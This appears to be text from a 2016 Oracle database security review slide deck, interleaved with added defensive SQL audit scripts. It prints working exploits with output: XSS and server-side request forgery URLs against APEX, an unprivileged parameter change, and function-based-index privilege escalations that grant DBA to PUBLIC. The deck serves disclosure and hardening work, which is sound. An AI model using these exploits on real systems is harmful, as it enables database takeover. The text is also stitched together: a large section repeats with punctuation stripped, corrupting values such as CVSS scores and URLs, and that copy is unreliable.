Try to get EXEMPT ACCESS POLICY to disable VPD (even if it is not used in the application).
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL).
Always check the object type (is it really a table?).
Use checksums for certain database objects (especially views).
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser).
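A worked version of the countermeasures above, as an added example that is not part of the original slides: one SQL script an auditor can run before trusting a database's answers. It assumes Oracle 12c dictionary views (REDACTION_POLICIES, DBA_SQL_TRANSLATIONS, DBA_VIEWS.TEXT_VC, STANDARD_HASH); the view list in step 6 is an assumed baseline.

```sql
-- Added example, not from the original slides: an auditor's self-check to run
-- before trusting any answer from a database whose DBA may have prepared it.
-- Every dictionary object is referenced fully qualified (SYS.*), because an
-- unqualified name such as DUAL or V$PARAMETER resolves through a public
-- synonym that the DBA can redirect. Assumes Oracle 12c (REDACTION_POLICIES,
-- DBA_SQL_TRANSLATIONS, DBA_VIEWS.TEXT_VC and STANDARD_HASH are 12c features);
-- the view list in step 6 is an assumed baseline, adjust it to your checklist.

-- 1. Who am I, and which schema do unqualified names resolve to?
--    "alter session set current_schema=otheruser" does not change SESSION_USER,
--    so the two values must agree for an audit session.
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM SYS.DUAL;

-- 2. Is DUAL still SYS.DUAL, and is it still a TABLE? The slides' PoC swaps the
--    public synonym for the view SYS.MYDUAL. Expect exactly one row:
--    PUBLIC | DUAL | SYS | DUAL | TABLE
SELECT s.owner, s.synonym_name, s.table_owner, s.table_name, o.object_type
  FROM SYS.DBA_SYNONYMS s
  JOIN SYS.DBA_OBJECTS  o
    ON o.owner = s.table_owner AND o.object_name = s.table_name
 WHERE s.synonym_name = 'DUAL';

-- 3. Data Redaction rewrites selected values per user (the TRUE/FALSE trick).
--    A database that does not use the feature returns no rows here.
SELECT object_owner, object_name, policy_name, expression, enable
  FROM SYS.REDACTION_POLICIES;

-- 4. VPD adds WHERE predicates behind the caller's back (the hidden invoice).
--    List every policy with its policy function so the predicate can be read,
--    and check whether this session is exempt from them at all.
SELECT object_owner, object_name, policy_name, function, package, enable
  FROM SYS.DBA_POLICIES
 ORDER BY object_owner, object_name;
SELECT privilege
  FROM SYS.SESSION_PRIVS
 WHERE privilege = 'EXEMPT ACCESS POLICY';     -- one row = VPD bypassed

-- 5. SQL Translation Framework: registered query-A-to-query-B replacements,
--    and whether a translation profile is active for this very session.
SELECT t.owner, t.profile_name, t.sql_text, t.translated_text, t.enabled
  FROM SYS.DBA_SQL_TRANSLATIONS t;
SELECT name, value
  FROM SYS.V_$PARAMETER
 WHERE name = 'sql_translation_profile';        -- VALUE must be empty

-- 6. Views as man in the middle: hash the text of the views the audit relies
--    on and compare with hashes taken from a trusted installation of the same
--    patch level. Also list INSTEAD OF triggers, which let a view pose as a
--    writable table.
SELECT owner, view_name, STANDARD_HASH(text_vc, 'SHA256') AS view_text_sha256
  FROM SYS.DBA_VIEWS
 WHERE owner = 'SYS'
   AND view_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS', 'DBA_SYS_PRIVS',
                     'DBA_ROLE_PRIVS', 'DBA_TAB_PRIVS');
SELECT owner, trigger_name, table_owner, table_name
  FROM SYS.DBA_TRIGGERS
 WHERE trigger_type = 'INSTEAD OF';

-- 7. Only now run the actual checklist query: fully qualified, and with a
--    random comment so its text (and therefore its SQL_ID) cannot match a
--    translation registered for the checklist tool's exact statement.
SELECT /* audit-aksdjhiuz */ UPPER(value) AS value
  FROM SYS.V_$PARAMETER
 WHERE UPPER(name) = 'O7_DICTIONARY_ACCESSIBILITY';
```

The dictionary views queried here are themselves SYS-owned views, so step 6 should also cover every view the script depends on when the DBA is the party under audit.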
Modifying Queries on the fly
Powerful features for applications.
(Huge) potential on critical systems to modify application logic (e.g. DB Vault).
DBAs and Auditors/Security Department should be aware of powerful Oracle features which could be used to modify application logic.
Audit these features even if they are not in use.
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of Auditing with SIEM solutions
Q & A
Thank you
Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 9.0)
1 JDBC (CVSS 8.1, remote)
1 Portable Clusterware (CVSS 7.5, remote)
1 Data Pump (CVSS 6.7)
2 APEX (CVSS 6.1, 5.8, 2 remote)
1 RDBMS Security (CVSS 5.3, remote)
1 DB Sharding (CVSS 4.4)
1 Database Vault (CVSS 3.4)
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU - CVE-2016-3448
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To access it, the schema (APEX_050000) needs to be specified first, however, because the config file whitelists apex.
Reporter: David Litchfield
Exploit:
http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: APEX 5 is vulnerable to a server-side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on port and POST X as a payload. This can be used as a port scanning mechanism, used to attack systems protected by a firewall, etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Apr 2016 CPU - CVE-2016-3488
Problem: Package dbms_gsm_common allows to change database parameters without the admin privileges and without a restart.
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE')
Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY  FALSE
-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE')
PL/SQL-Prozedur erfolgreich abgeschlossen.
-- as user SYS - re-run again after execution of the package
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY  TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter: Alexander Kornbrust
Problem (Details + Exploit later…)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function based index (FBI)
Reporter: Alexander Kornbrust
July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4
SYSTEM SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE != OWNER and owner='SYS';
GRANTEE                        OWNER                          TABLE_NAME
------------------------------ ------------------------------ ------------------------------
SYSTEM                         SYS                            INCEXP
SYSTEM                         SYS                            INCFIL
SYSTEM                         SYS                            INCVID
SYSTEM SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on getdba to public;
July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges
==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4
==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.
SQL> select count(*) from sys.link$;
  COUNT(*)
----------
        11
July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGES)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1
-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;
-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + Supporting documents:
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 / SHA-512 based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret.
Secret = 'XDB'
and the hash will be MD5(XDB:tiger)
and stored in the spare4 column, starting with "H:" (Hash)
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from using the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust
sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist
==> user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;
USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM                     UNLIMITED TABLESPACE                     NO
SYSMAN_APM                     CREATE VIEW                              NO
SYSMAN_APM                     CREATE ANY LIBRARY                       NO
SYSMAN_APM                     CREATE SEQUENCE                          NO
SYSMAN_APM                     CREATE TABLE                             NO
SYSMAN_APM                     CREATE LIBRARY                           NO
SYSMAN_APM                     CREATE ANY INDEX                         NO
==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM                     CONNECT                        NO  YES NO
SYSMAN_APM                     RESOURCE                       NO  YES NO
==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant dba to public';
  COMMIT;
  RETURN FOO;
END;
/
==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;
==> Create an index on SYSTEM.HELP using a function based index (FBI). The function getdba is used for the function based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));
==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';
GRANTEE                        GRANTED_ROLE                   ADM DEF
------------------------------ ------------------------------ --- ---
PUBLIC                         DBA                            NO  YES
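Added here as a defender's check, not from the slides and not the reporter's code: the dictionary queries that inventory the preconditions the two function-based-index escalations above (CVE-2016-3489 and CVE-2016-5604) relied on, and the grants a successful run would leave behind. It assumes the standard 11.2 / 12.1 data dictionary views; all names are fully qualified.

```sql
-- Added example, not from the slides and not the reporter's code: a defender's
-- inventory of the preconditions the two function-based-index escalations
-- (CVE-2016-3489, CVE-2016-5604) relied on, plus the traces a successful run
-- leaves behind. Assumes the standard 11.2 / 12.1 dictionary views; SYS-owned
-- names are fully qualified for the reason given in the countermeasures slide.

-- 1. Object-level INDEX privilege on SYS/SYSTEM tables held by another user.
--    On 11.2.0.4 the slides show SYSTEM holding INDEX on SYS.INCEXP/INCFIL/INCVID;
--    that is what let an index on a SYS table call SYSTEM's function with SYS
--    privileges. Expect no rows.
SELECT grantee, owner, table_name
  FROM SYS.DBA_TAB_PRIVS
 WHERE privilege = 'INDEX'
   AND owner IN ('SYS', 'SYSTEM')
   AND grantee <> owner
 ORDER BY grantee, owner, table_name;

-- 2. System privileges that give the same reach to everybody else: CREATE ANY
--    INDEX (WMSYS, SYSMAN_APM in the slides), CREATE ANY PROCEDURE (used to
--    plant the function in WMSYS) and, on 12c, INHERIT ANY PRIVILEGES, whose
--    absence is what stopped SYSTEM's direct attempt with ORA-06598.
SELECT grantee, privilege, admin_option
  FROM SYS.DBA_SYS_PRIVS
 WHERE privilege IN ('CREATE ANY INDEX', 'CREATE ANY PROCEDURE',
                     'INHERIT ANY PRIVILEGES')
   AND grantee NOT IN ('SYS', 'DBA')
 ORDER BY privilege, grantee;

-- 3. Function-based indexes on SYS/SYSTEM tables. The expression shows which
--    function the index calls; one owned by a low-privileged schema
--    (SYSTEM.GETDBA, SYSMAN_APM.GETDBA in the slides) is the tell.
--    COLUMN_EXPRESSION is a LONG, so it cannot be filtered in the WHERE clause.
SELECT index_owner, index_name, table_owner, table_name, column_expression
  FROM SYS.DBA_IND_EXPRESSIONS
 WHERE table_owner IN ('SYS', 'SYSTEM')
 ORDER BY table_owner, table_name, index_name;

-- 4. Invoker-rights functions outside SYS: AUTHID CURRENT_USER is the property
--    both GETDBA variants needed so that the GRANT inside them runs with the
--    privileges of whoever maintains the index. Review each hit.
SELECT owner, object_name, authid
  FROM SYS.DBA_PROCEDURES
 WHERE object_type = 'FUNCTION'
   AND authid = 'CURRENT_USER'
   AND owner <> 'SYS'
 ORDER BY owner, object_name;

-- 5. Post-exploitation traces the two walkthroughs would leave: SELECT on
--    SYS.LINK$ granted to PUBLIC, and the DBA role granted to PUBLIC. Both
--    must return no rows on a healthy database.
SELECT grantee, privilege
  FROM SYS.DBA_TAB_PRIVS
 WHERE owner = 'SYS' AND table_name = 'LINK$' AND grantee = 'PUBLIC';
SELECT grantee, granted_role
  FROM SYS.DBA_ROLE_PRIVS
 WHERE granted_role = 'DBA' AND grantee = 'PUBLIC';
```

Run it once before and once after applying the CPU; step 1 is the finding the July 2016 fix addresses, while steps 2 to 4 stay relevant for any later function-based-index variant.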
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4, user SYSTEM
SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE != OWNER and owner='SYS';

GRANTEE    OWNER    TABLE_NAME
---------- -------- ------------
SYSTEM     SYS      INCEXP
SYSTEM     SYS      INCFIL
SYSTEM     SYS      INCVID

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2  PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4  execute immediate 'grant select on sys.link$ to public';
  5  COMMIT;
  6  RETURN FOO;
  7  END;
  8  /
SQL> grant execute on getdba to public;

July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges

==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4

==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.

SQL> select count(*) from sys.link$;
  COUNT(*)
----------
        11

July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM does no longer have INHERIT ANY PRIVILEGES)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA(1));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCvid(SYSTEM.GETDBA(1))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1

-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX, and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;

-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + Supporting documents
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 SHA-512 based algorithm
The new T password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already implemented in some tools
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret
Secret = 'XDB'
and the hash will be MD5(XDB:tiger)
and stored in the spare4 column as the hash starting with "H:"
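A check that goes with this slide, added here as an example and not part of the original deck: it lists the accounts whose verifier string in SYS.USER$.SPARE4 still contains the unsalted digest ("H:") section next to the SHA-1 ("S:") and PBKDF2 ("T:") verifiers, so they can be reviewed before an auditor finds them. It assumes the 12.1.0.2 layout of SPARE4 ('S:...;H:...;T:...') and a SYSDBA session; the column aliases are chosen for this example.

```sql
-- Added example (not from the slides): which accounts still carry the
-- unsalted MD5 digest verifier (H:) in SYS.USER$.SPARE4? Run as SYSDBA.
-- Assumption: 12.1.0.2 stores the verifiers as 'S:<sha1>;H:<md5>;T:<pbkdf2>'.
SELECT u.name,
       a.account_status,
       CASE WHEN u.spare4 LIKE '%S:%' THEN 'YES' ELSE 'NO' END AS has_sha1_verifier,
       CASE WHEN u.spare4 LIKE '%H:%' THEN 'YES' ELSE 'NO' END AS has_md5_digest,
       CASE WHEN u.spare4 LIKE '%T:%' THEN 'YES' ELSE 'NO' END AS has_pbkdf2_verifier
  FROM sys.user$ u
  JOIN dba_users a ON a.username = u.name
 WHERE u.type# = 1                     -- users only, roles are type# 0
 ORDER BY has_md5_digest DESC, u.name;

-- One-line summary for the audit report: how many open accounts still have
-- the digest verifier at all.
SELECT COUNT(*) AS accounts_with_md5_digest
  FROM sys.user$ u
  JOIN dba_users a ON a.username = u.name
 WHERE u.type# = 1
   AND a.account_status = 'OPEN'
   AND u.spare4 LIKE '%H:%';
```

Any open account that shows YES in has_md5_digest is protected only as well as MD5 over secret:password protects it, regardless of how strong the PBKDF2 verifier next to it is.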
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust

sqlplus sysman_apmrdsora1
SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist

==> user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;

USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM                     UNLIMITED TABLESPACE                     NO
SYSMAN_APM                     CREATE VIEW                              NO
SYSMAN_APM                     CREATE ANY LIBRARY                       NO
SYSMAN_APM                     CREATE SEQUENCE                          NO
SYSMAN_APM                     CREATE TABLE                             NO
SYSMAN_APM                     CREATE LIBRARY                           NO
SYSMAN_APM                     CREATE ANY INDEX                         NO

==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM                     CONNECT                        NO  YES NO
SYSMAN_APM                     RESOURCE                       NO  YES NO

==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2  PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4  execute immediate 'grant dba to public';
  5  COMMIT;
  6  RETURN FOO;
  7  END;
  8  /

==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;

==> Create an index on SYSTEM.HELP using a function based index (FBI). The function getdba is used for the function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';

GRANTEE                        GRANTED_ROLE                   ADM DEF
------------------------------ ------------------------------ --- ---
PUBLIC                         DBA                            NO  YES
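Both the CVE-2016-3489 and the CVE-2016-5604 demos above rest on the same three ingredients: a grant that lets a low-privileged user create an index on a table owned by SYS or SYSTEM (an INDEX object privilege or CREATE ANY INDEX), a function that runs with the caller's rights (AUTHID CURRENT_USER) reachable from that index expression, and, on 12.1, INHERIT ANY PRIVILEGES or a way around it (CREATE ANY PROCEDURE into WMSYS). The script below is an added example and not part of the deck; it inventories exactly those preconditions so a DBA can find them before they are used. It assumes a SYSDBA session on 11.2 or 12.1 and lists direct grants only (grants that arrive through roles need a separate walk of DBA_ROLE_PRIVS).

```sql
-- Added example, not part of the slides: audit the preconditions that the
-- CVE-2016-3489 and CVE-2016-5604 demos rely on. Run as SYSDBA.

-- 1. INDEX object privilege on SYS/SYSTEM tables held by another user
--    (the 11.2.0.4 demo used SYSTEM's INDEX grant on SYS.INCVID).
SELECT grantee, owner, table_name
  FROM dba_tab_privs
 WHERE privilege = 'INDEX'
   AND owner IN ('SYS', 'SYSTEM')
   AND grantee <> owner
 ORDER BY grantee, owner, table_name;

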